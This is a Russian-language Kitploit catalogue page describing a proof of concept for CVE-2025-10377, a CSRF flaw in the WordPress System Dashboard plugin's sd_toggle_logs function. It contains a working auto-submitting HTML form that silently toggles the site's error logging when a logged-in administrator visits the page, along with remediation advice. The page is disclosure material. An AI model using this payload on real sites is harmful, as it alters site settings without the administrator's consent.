Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-10377 — CVE-2025-10377 | Kitploit
Инструменты/GitHubGitHub/nagisayumaa/cve-2025-10377
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubnagisayumaa/cve-2025-10377

CVE-2025-10377

CVE-2025-10377

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Доказательство концепции CVE-2025-10377 Межсайтовая подделка запросов (CSRF) в плагине System Dashboard (Функция sd_toggle_logs)

Тип уязвимости: Межсайтовая подделка запросов (CSRF)

Затронутая функция: sd_toggle_logs()

CVSS v3.1: 4.3 (Средний)
Vector: AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N
(Примечание: Оценка отражает несанкционированное изменение состояния, требующее жертву-администратора и взаимодействия пользователя.)

Описание уязвимости:

Функция sd_toggle_logs() обрабатывает чувствительные операции, такие как включение/отключение журналов доступа к страницам, журналов ошибок и журналов доставки электронной почты. Однако она полагается исключительно на параметр $_REQUEST['log_type'] и проверку прав (current_user_can( 'manage_options' )) без реализации защиты от CSRF (например, check_admin_referer() или nonce).

В результате злоумышленник может заманить вошедшего в систему администратора на вредоносную страницу, которая незаметно отправляет специально созданный запрос, вызывая непреднамеренные изменения включения/отключения ведения журнала сайта.

Воздействие:

  • Несанкционированные изменения состояния функций ведения журнала сайта (журнал доступа к страницам, журнал ошибок, журнал доставки электронной почты).

  • Если включено ведение журнала ошибок, сайт может начать запись ошибок приложения в путь к файлу, определенный плагином (увеличивая вероятность раскрытия операционной информации через журналы), но непосредственным воздействием этой проблемы является само переключение состояния.

POC

Когда вошедший в систему пользователь с правами manage_options посещает страницу злоумышленника, соответствующая функция ведения журнала переключается без явного согласия.

 <body>
    <form action="http://victim.com/wordpress/wp-admin/admin-ajax.php">
      <input type="hidden" name="action" value="sd&#95;toggle&#95;logs" />
      <input type="hidden" name="log&#95;type" value="errors&#95;log" />
      <input type="hidden" name="fast&#95;ajax" value="true" />
      <input type="hidden" name="load&#95;plugins&#91;&#93;" value="system&#45;dashboard&#47;system&#45;dashboard&#46;php" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Устранение

  • Внедрите nonce WordPress (check_admin_referer() или wp_verify_nonce()) для проверки запросов.

  • Ограничьте чувствительные действия только POST-запросами.

  • Избегайте полагаться исключительно на проверку прав для защиты от CSRF.

Видео POC

Если вы не можете воспроизвести проблему точно так, как описано в отчете, обратитесь к следующей видео-демонстрации (PoC) для получения четкого сценария воспроизведения:

https://youtu.be/WtWYIfEM4W0

Скачать инструмент